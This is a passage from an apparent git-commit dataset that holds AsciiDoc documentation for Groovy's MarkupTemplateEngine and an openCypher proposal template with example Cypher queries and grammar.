By declaring the type of `pages` to the template engine, we're now capable of failing at compile time:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_setup_fixed,indent=0]\n----\n<1> create a map which will hold the model types\n<2> declare the type of the `pages` variable (note the use of a string for the type)\n<3> use `createTypeCheckedModelTemplate` instead of `createTemplate`\n\nThis time, when the template is compiled at the last line, an error occurs:\n\n.Template compilation time error\n----\n[Static type checking] - No such property: text for class: Page\n----\n\nThis means that you don't need to wait for the page to be rendered to see an error. The use of `createTypeCheckedModelTemplate` is mandatory.\n\n=== Alternative declaration of types\n\nAlternatively, if the developer is also the one who writes the templates, it is possible to declare the types of the expected variables\ndirectly in the template. In this case, even if you call `createTemplate`, it will be type checked:\n\n[source,groovy]\n.Inline declaration of types\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_inlined_template,indent=0]\n----\n<1> types need to be declared in the `modelTypes` header\n<2> declare one variable per object in the model\n\n=== Performance of type checked templates\n\nAn additional benefit of using type checked models is that performance should improve. By telling the type checker what the expected types are,\nyou also let the compiler generate optimized code for that, so if you are looking for the best performance, consider using type checked templates.\n\n","old_contents":"= The MarkupTemplateEngine\n\nThis template engine is primarily aimed at generating XML-like markup (XML, XHTML, HTML5, ...). Unlike\ntraditional template engines, this one relies on a DSL that uses the builder syntax. Here is a sample template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_template,indent=0]\n----\n\nIf you feed it with the following model:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_model,indent=0]\n----\n\nIt would be rendered as:\n\n[source,xml]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_expected,indent=0]\n----\n\nThe key features of this template engine are:\n\n* a _markup builder like_ syntax\n* templates are compiled into bytecode\n* fast rendering\n* optional type checking of the model\n* includes\n* internationalization support\n\n== The template format\n=== Basics\n\nTemplates consist of Groovy code. Let's explore the first example more thoroughly:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_template_with_bullets,indent=0]\n----\n<1> renders the XML declaration string.\n<2> opens a `cars` tag\n<3> `cars` is a variable found in the _template model_, which is a list of `Car` instances\n<4> for each item, we create a `car` tag with the attributes from the `Car` instance\n<5> closes the `cars` tag\n\nAs you can see, regular Groovy code can be used in the template. 
Here, we are calling `each` on a list (retrieved from the model), allowing us to\nrender one `car` tag per entry.\n\nIn a similar fashion, rendering HTML code is as simple as this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example2_template,indent=0]\n----\n<1> renders the HTML doctype special tag\n<2> opens the `html` tag with an attribute\n<3> opens the `head` tag\n<4> renders a `meta` tag with one `http-equiv` attribute\n<5> renders the `title` tag\n<6> closes the `head` tag\n<7> opens the `body` tag\n<8> renders a `p` tag\n<9> closes the `body` tag\n<10> closes the `html` tag\n\nThe output is straightforward:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example2_expected,indent=0]\n----\n\nNOTE: With some <<markuptemplate-config,configuration>>, you can have the output pretty printed, with newlines and indent automatically added.\n\n=== Support methods\n\nIn the previous example, the doctype declaration was rendered using the `yieldUnescaped` method. We have also seen the `xmlDeclaration` method.\nThe template engine provides several support methods that will help you render contents appropriately:\n\n[cols=\"1,2,3a\",options=\"header\"]\n|=======================================================================\n|Method|Description|Example\n|yield\n|Renders contents, but escapes it before rendering\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yield,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yield_expected,indent=0]\n```\n|yieldUnescaped\n|Renders raw contents. The argument is rendered as is, without escaping.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yieldUnescaped,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yieldUnescaped_expected,indent=0]\n```\n\n|xmlDeclaration\n|Renders an XML declaration String. If the encoding is specified in the configuration, it is written in the declaration.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_expected,indent=0]\n```\n\nIf `TemplateConfiguration#getDeclarationEncoding` is not null:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_encoding_expected,indent=0]\n```\n\n|comment\n|Renders raw contents inside an XML comment\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=comment,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=comment_expected,indent=0]\n```\n\n|newLine\n|Renders a new line. 
See also `TemplateConfiguration#setAutoNewLine` and `TemplateConfiguration#setNewLineString`.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newline,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newline_expected,indent=0]\n```\n\n|pi\n|Renders an XML processing instruction.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=pi,indent=0]\n```\n\n*Output*:\n```xml\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=pi_expected,indent=0]\n```\n\n|tryEscape\n|Returns an escaped string for an object, if it is a `String` (or any type derived from `CharSequence`). Otherwise returns the object itself.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=tryEscape,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=tryEscape_expected,indent=0]\n```\n\n|=======================================================================\n\n=== Includes\n\nThe `MarkupTemplateEngine` supports inclusion of contents from another file. Included contents may be:\n\n* another template\n* raw contents\n* contents to be escaped\n\nIncluding another template can be done using:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=include_template,indent=0]\n----\n\nIncluding a file as raw contents, without escaping it, can be done like this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=include_raw,indent=0]\n----\n\nEventually, inclusion of text that should be escaped before rendering can be done using:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=include_escaped,indent=0]\n----\n\nAlternatively, you can use the following helper methods instead:\n\n* `includeGroovy(<name>)` to include another template\n* `includeEscaped(<name>)` to include another file with escaping\n* `includeUnescaped(<name>)` to include another file without escaping\n\nCalling those methods instead of the `include xxx:` syntax can be useful if the name of the file to be included is dynamic (stored in a variable for example).\nFiles to be included (independently of their type, template or text) are found on *classpath*. 
This is one of the reasons why the `MarkupTemplateEngine` takes\nan optional `ClassLoader` as constructor argument (the other reason being that you can include code referencing other classes in a template).\n\nIf you don't want your templates to be on classpath, the `MarkupTemplateEngine` accepts a convenient constructor that lets you define the directory where\ntemplates are to be found.\n\n== Rendering contents\n=== Creation of a template engine\nOn the server side, rendering templates require an instance of `groovy.text.markup.MarkupTemplateEngine` and a\n`groovy.text.markup.TemplateConfiguration`:\n\n[source,java]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=rendering_setup,indent=0]\n----\n<1> creates a template configuration\n<2> creates a template engine with this configuration\n<3> creates a template instance from a `String`\n<4> creates a model to be used in the template\n<5> bind the model to the template instance\n<6> render output\n\nThere are several possible options to parse templates:\n\n* from a `String`, using `createTemplate(String)`\n* from a `Reader`, using `createTemplate(Reader)`\n* from a `URL`, using `createTemplate(URL)`\n* given a template name, using `createTemplateByPath(String)`\n\nThe last version should in general be preferred:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=rendering_by_name,indent=0]\n----\n\n[[markuptemplate-config]]\n=== Configuration options\n\nThe behavior of the engine can be tweaked with several configuration options accessible through the `TemplateConfiguration` class:\n\n[cols=\"1,1,2,3a\",options=\"header\"]\n|=======================================================================\n|Option|Default value|Description|Example\n|declarationEncoding\n|null\n|Determines the value of the encoding to be written when `xmlDeclaration` is called. 
It does *not* influence the writer you are using as output.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_expected,indent=0]\n```\n\nIf `TemplateConfiguration#getDeclarationEncoding` is not null:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_encoding_expected,indent=0]\n```\n\n|expandEmptyElements\n|false\n|If true, empty tags are rendered in their expanded form.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=expandEmptyElements,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=expandEmptyElements_false,indent=0]\n```\n\nIf `expandEmptyElements` is true:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=expandEmptyElements_true,indent=0]\n```\n\n|useDoubleQuotes\n|false\n|If true, use double quotes for attributes instead of simple quotes\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=useDoubleQuotes,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=useDoubleQuotes_false,indent=0]\n```\n\nIf `useDoubleQuotes` is true:\n\n*Output*:\n```xml\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=useDoubleQuotes_true,indent=0]\n```\n\n|newLineString\n|System default (system property `line.separator`)\n|Allows to choose what string is used when a new line is rendered\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newLineString,indent=0]\n```\n\nIf `newLineString='BAR'`:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newLineString_expected,indent=0]\n```\n\n|autoEscape\n|false\n|If true, variables from models are automatically escaped before rendering.\n|See <<markuptemplate-autoescape, the auto escape section>>\n\n|autoIndent\n|false\n|If true, performs automatic indentation after new lines\n|See <<markuptemplate-autoformat, the auto formatting section>>\n\n|autoIndentString\n|four (4) spaces\n|The string to be used as indent.\n|See <<markuptemplate-autoformat, the auto formatting section>>\n\n|autoNewLine\n|false\n|If true, performs automatic insertion of new lines\n|See <<markuptemplate-autoformat, the auto formatting section>>\n\n|baseTemplateClass\n|`groovy.text.markup.BaseTemplate`\n|Sets the super class of compiled templates. 
This can be used to provide application specific templates.\n|See <<markuptemplate-basetemplate, the custom templates section>>\n\n|locale\n|Default locale\n|Sets the default locale for templates.\n|See <<markuptemplate-i18n, the internationalization section>>\n\n|=======================================================================\n\nWARNING: Once the template engine has been created, it is *unsafe* to change the configuration.\n\n[[markuptemplate-autoformat]]\n=== Automatic formatting\n\nBy default, the template engine will render output without any specific formatting. Some <<markuptemplate-config,configuration options>> can improve the situation:\n\n* `autoIndent` is responsible for auto-indenting after a new line is inserted\n* `autoNewLine` is responsible for automatically inserting new lines based on the original formatting of the template source\n\nIn general, it is recommanded to set both `autoIndent` and `autoNewLine` to true if you want human-readable, pretty printed, output:\n\n[source,java]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_setup,indent=0]\n----\n\nUsing the following template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template,indent=0]\n----\n\nThe output will now be:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template_expected,indent=0]\n----\n\nWe can slightly change the template so that the `title` intruction is found on the same line as the `head` one:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template2,indent=0]\n----\n\nAnd the output will reflect that:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template2_expected,indent=0]\n----\n\nNew lines are *only* inserted where curly braces for tags are found, and the insertion corresponds to where the nested content is found. This means that\ntags in the body of another tag will *not* trigger new lines unless they use curly braces themselves:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template3,indent=0]\n----\n<1> a new line is inserted because `meta` is not on the same line as `head`\n<2> no new line is inserted, because we're on the same depth as the previous tag\n<3> we can force rendering of a new line by explicitly calling `newLine`\n<4> and this tag will be rendered on a separate line\n\nThis time, the output will be:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template3_expected,indent=0]\n----\n\nBy default, the renderer uses four(4) spaces as indent, but you can change it by setting the `TemplateConfiguration#autoIndentString` property.\n\n[[markuptemplate-autoescape]]\n=== Automatic escaping\n\nBy default, contents which is read from the model is rendered *as is*. If this contents comes from user input, it can be sensible, and you might\nwant to escape it by default, for example to avoid XSS injection. 
For that, the template configuration provides an option which will automatically\nescape objects from the model, as long as they inherit from `CharSequence` (typically, `String`s).\n\nLet's imagine the following setup:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_setup,indent=0]\n----\n\nand the following template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template,indent=0]\n----\n\nThen you wouldn't want the HTML from `unsafeContents` to be rendered as is, because of potential security issues:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template_expected,indent=0]\n----\n\nAutomatic escaping will fix this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_setup_fixed,indent=0]\n----\n\nAnd now the output is properly escaped:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template_fixed_expected,indent=0]\n----\n\nNote that using automatic escaping doesn't prevent you from including unescaped contents from the model. To do this, your template should then explicitly\nmention that a model variable should not be escaped by prefixing it with `unescaped.`, like in this example:\n\n[source,html]\n.Explicit bypass of automatic escaping\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template_unescaped,indent=0]\n----\n\n[[markuptemplate-i18n]]\n=== Internationalization\n\nThe template engine has native support for internationalization. For that, when you create the `TemplateConfiguration`, you can provide\na `Locale` which is the default locale to be used for templates. Each template may have different versions, one for each locale. 
The\nname of the template makes the difference:\n\n* `file.tpl`: default template file\n* `file_fr_FR.tpl`: french version of the template\n* `file_en_US.tpl`: american english version of the template\n* ...\n\nWhen a template is rendered or included, then:\n\n* if the template name or include name *explicitly* sets a locale, the *specific* version is included, or the default version if not found\n* if the template name doesn't include a locale, the version for the `TemplateConfiguration` locale is used, or the default version if not found\n\nFor example, imagine the default locale is set to `Locale.ENGLISH` and that the main template includes:\n\n[source,groovy]\n.Use an explicit locale in include\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_explicit_import,indent=0]\n----\n\nthen the template is rendered using the specific template:\n\n[source,html]\n.Bypass the template configuration\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_explicit_import_expected,indent=0]\n----\n\nUsing an include without specifying a locale will make the template engine look for a template with the configured locale, and if not, fallback to the default, like here:\n\n[source,groovy]\n.Don't use a locale in include\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_implicit_import,indent=0]\n----\n\n[source,html]\n.Fallback to the default template\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_implicit_import_expected,indent=0]\n----\n\nHowever, changing the default locale of the template engine to `Locale.FRANCE` will change the output, because the template engine will now look for a file\nwith the `fr_FR` locale:\n\n[source,html]\n.Don't fallback to the default template because a locale specific template was found\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_implicit_import_expected2,indent=0]\n----\n\nThis strategy lets you translate your templates one by one, by relying on default templates, for which no locale is set in the file name.\n\n[[markuptemplate-basetemplate]]\n=== Custom template classes\n\nBy default, templates created inherit the `groovy.text.markup.BaseTemplate` class. 
It may be interesting for an application to provide a different\ntemplate class, for example to provide additional helper methods which are aware of the application, or customized rendering primitives (for HTML,\nfor example).\n\nThe template engine provides this ability by setting an alternative `baseTemplateClass` in the `TemplateConfiguration`:\n\n[source,java]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=custombase_config,indent=0]\n----\n\nThe custom base class has to extend `BaseClass` like in this example:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MyTemplate.groovy[tags=basetemplate_class,indent=0]\n----\n\nThis example shows a class which provides an additional method named `hasModule`, which can then be used directly in the template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=custombase_template,indent=0]\n----\n\n== Type checked templates\n=== Optional type checking\n\nEven if templates are not type checked, they are statically compiled. This means that once the templates are compiled, performance should be very good. For some\napplications, it might be good to make sure that templates are valid before they are actually rendered. This means failing template compilation, for example, if\na method on a model variable doesn't exist.\n\nThe `MarkupTemplateEngine` provides such a facility. Templates can be optionally type checked. For that, the developer must provide additional information at\ntemplate creation time, which is the types of the variables found in the model. Imagine a model exposing a list of pages, where a page is defined as:\n\n[source,groovy]\n.Page.groovy\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=page_class,indent=0]\n----\n\nThen a list of pages can be exposed in the model, like this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_setup_no_stc,indent=0]\n----\n\nA template can use it easily:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_template,indent=0]\n----\n<1> iterate on pages from the model\n<2> `page.title` is valid\n<3> `page.text` is *not* (should be `page.body`)\n\nWithout type checking, the compilation of the template succeeds, because the template engine doesn't know about the model until a page\nis actually rendered. This means that the problem would only surface at runtime, once the page is rendered:\n\n.Runtime error\n----\nNo such property: text\n----\n\nIn some situations, this can be complicated to sort out or even notice. 
By declaring the type of the `pages` to the template engine, we're now capable of failing at compile time:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_setup_fixed,indent=0]\n----\n<1> create a map which will hold the model types\n<2> declare the type of the `pages` variables (note the use of a string for the type)\n<3> use `createTypeCheckedModelTemplate` instead of `createTemplate`\n\nThis time, when the template is compiled at the last line, an error occurs:\n\n.Template compilation time error\n----\n[Static type checking] - No such property: text for class: Page\n----\n\nThis means that you don't need to wait for the page to be rendered to see an error. The use of `createTypeCheckedModelTemplate` is mandatory.\n\n=== Alternative declaration of types\n\nAlternatively, if the developer is also the one who writes the templates, it is possible to declare the types of the expected variables\ndirectly in the template. In this case, even if you call `createTemplate`, it will be type checked:\n\n[source,groovy]\n.Inline declaration of types\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_inlined_template,indent=0]\n----\n<1> types need to be declared in the `modelTypes` header\n<2> declare one variable per object in the model\n\n=== Performance of type checked templates\n\nAn additional interest of using type checked models is that performance should improve. By telling the type checker what are the expected types,\nyou also let the compiler generate optimized code for that, so if you are looking for the best performance, consider using type checked templates.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d753f9e206b86f5b3c7a98dd646b86ff160f74a2","subject":"Update readme.asciidoc","message":"Update readme.asciidoc","repos":"ooms\/materials,ooms\/materials,devoxx4kids\/materials,devoxx4kids\/materials,ooms\/materials,ooms\/materials,devoxx4kids\/materials,devoxx4kids\/materials,ooms\/materials,devoxx4kids\/materials,ooms\/materials,ooms\/materials,devoxx4kids\/materials,devoxx4kids\/materials","old_file":"workshops\/minecraft\/readme.asciidoc","new_file":"workshops\/minecraft\/readme.asciidoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"45056d08d700df2264ffb50e33bd2e751785184e","subject":"Amended the formatting of the CIP template","message":"Amended the formatting of the CIP template\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP-Template.adoc","new_file":"cip\/CIP-Template.adoc","new_contents":"= CIP<CCYY>-<MM>-<DD> - <The title of the CIP>\n:numbered:\n:toc:\n:toc-placement: macro\n:source-highlighter: codemirror\n\n*Author:* <Author name> <Author email>\n\n[IMPORTANT]\n.Guidelines\n====\n* Please use this template as a guide.\n To aid clarity and give an idea of what the pertinent section denotes, some headings have example text.\n\n* The file naming convention is _CIP<CCYY>-<MM>-<DD>-short-title-words.adoc_.\n\n* Label the pull request for the CIP with the correct Cypher vocabulary(ies).\n\n* The CIP may only consider Cypher language features.\n This means the CIP must make no mention of Neo4j.\n\n* Format Cypher and EBNF for readability.\n\n* Write one sentence per line.\n====\n\n[abstract]\n.Abstract\n--\nThis is a 
high-level summary of the aim and description of the CIP.\n--\n\ntoc::[]\n\n\n== Motivation\n\nProvide the rationale and justification for the proposed feature(s).\n\n== Background\n\nThis is further background regarding the CIP, should it be required or deemed useful.\n\nPlease ensure that links to related documents (including other CIPs) are provided.\n\n== Proposal\n\nThis comprises the detail of the CIP, and is divided into the sub-sections below.\n\n=== Examples\n\nFor each aspect of the proposed feature(s), provide at least one Cypher example query to show how the feature is envisaged to work, along with explanatory text.\n\n_An example of this is shown below:_\n\n[source, cypher]\n.Find all persons whose name starts with \"And\"\n----\nMATCH (a:Person) WHERE a.name STARTS WITH \"And\"\nRETURN a\n----\n\n[source, cypher]\n.Find all persons whose name starts with the parameter prefix\n----\nMATCH (a:Person) WHERE a.name STARTS WITH {prefix}\nRETURN a\n----\n\n[source, cypher]\n.Find all persons whose name ends with \"fan\"\n----\nMATCH (a:Person) WHERE a.name ENDS WITH \"fan\"\nRETURN a\n----\n\n[source, cypher]\n.Find all books whose isbn in string form contains \"007\"\n----\nMATCH (b:Book) WHERE toString(b.isbn) CONTAINS \"007\"\nRETURN b\n----\n\n=== Syntax\n\nProvide the full range of syntactic additions and modifications in EBNF (https:\/\/en.wikipedia.org\/wiki\/Extended_Backus-Naur_Form) format, along with explanatory text.\n\n_An example of this is shown below:_\n\n[source, ebnf]\n.Extend expressions to support string search operators\n----\nexpression = current definition of expression\n | string-search\n ;\n\nstring-search = starts-with | ends-with | contains ;\nstarts-with = expression, \"STARTS\", \"WITH\", expression ;\nends-with = expression, \"ENDS\", \"WITH\", expression ;\ncontains = expression, \"CONTAINS\", expression ;\n----\n\n=== Semantics\n\nProvide a description of the expected semantics of the new feature(s).\nUse subheadings to structure the content.\n\n_Examples are shown below in sections 3.3.1\u20133.3.3:_\n\n==== STARTS WITH\n\nUsing `lhs STARTS WITH rhs` requires both `lhs` and `rhs` to be strings. This new expression evaluates to true if `lhs` textually starts with `rhs`. Otherwise, it is false.\n\n==== ENDS WITH\n\nUsing `lhs ENDS WITH rhs` requires both `lhs` and `rhs` to be strings. This new expression evaluates to true if `lhs` textually ends with `rhs`. Otherwise, it is false.\n\n==== CONTAINS\n\nUsing `lhs CONTAINS rhs` requires both `lhs` and `rhs` to be strings.\nThis new expression evaluates to true if `lhs` textually contains `rhs`.\nOtherwise, it is false.\n\nIf any argument to `STARTS WITH`, `ENDS WITH`, or `CONTAINS` is `NULL`, then the result of evaluating the whole predicate is `NULL`.\n\nIt is a type error to use `STARTS WITH`, `ENDS WITH`, or `CONTAINS` with a value that is not a string.\n\n=== Interaction with existing features\n\nProvide details on any interactions that need to be considered.\n\n=== Alternatives\n\nList any alternatives here; e.g. 
new keywords, a smaller feature set etc.\n\n== What others do\n\nIf applicable, include a feature comparison table, along with any useful links.\n\nTo provide a well-rounded comparison, please ensure the inclusion of at least one SQL-based implementation -- such as DB2 or Postgres -- as well as SPARQL.\nIf you require any assistance or pointers to the latter, please contact petra.selmer@neotechnology.com.\n\n== Benefits to this proposal\n\nList the benefits here.\n\n== Caveats to this proposal\n\nList any caveats here.\nThese may include omissions, reasons for non-conformance with other features and so on.\n\n== Appendix\n\nPut any supplementary information here.\n","old_contents":":numbered:\n:toc:\n:toc-placement: macro\n\n= CIP<CCYY>-<MM>-<DD> - <The title of the CIP>\n\n*Author:* <Author name> <Author email>\n\n**_Guidelines:_**\n\n* **_Please use this template as a guide. To aid clarity and give an idea of what the pertinent section denotes, some headings have example text (in italics)._**\n\n* **_The file naming convention is 'CIP<CCYY>-<MM>-<DD>-short-title-words.adoc'._**\n\n* **_Label the pull request for the CIP with the correct Cypher vocabulary(ies)._**\n\n* **_The CIP may only consider Cypher language features. This means the CIP must make no mention of Neo4j._**\n\ntoc::[]\n\n== Abstract\n\nThis is a high-level summary of the aim and description of the CIP.\n\n== Motivation\n\nProvide the rationale and justification for the proposed feature(s).\n\n== Background\n\nThis is further background regarding the CIP, should it be required or deemed useful.\n\nPlease ensure that links to related documents (including other CIPs) are provided.\n\n== Proposal\n\nThis comprises the detail of the CIP, and is divided into the sub-sections below.\n\n=== Examples\n\nFor each aspect of the proposed feature(s), provide at least one Cypher example query to show how the feature is envisaged to work, along with explanatory text.\n\n*_Example:_* +\n_Find all persons whose name starts with \"And\"._\n\n----\nMATCH (a:Person) WHERE a.name STARTS WITH \u201cAnd\u201d\nRETURN a\n----\n\n_Find all persons whose name starts with the parameter prefix._\n\n----\nMATCH (a:Person) WHERE a.name STARTS WITH {prefix}\nRETURN a\n----\n\n_Find all persons whose name ends with \"fan\"._\n\n----\nMATCH (a:Person) WHERE a.name ENDS WITH \"fan\"\nRETURN a\n----\n\n_Find all books whose isbn in string form contains \"007\"._\n\n----\nMATCH (b:Book) WHERE toString(b.isbn) CONTAINS \"007\"\nRETURN a\n----\n\n=== Syntax\n\nProvide the full range of syntactic additions and modifications in EBNF 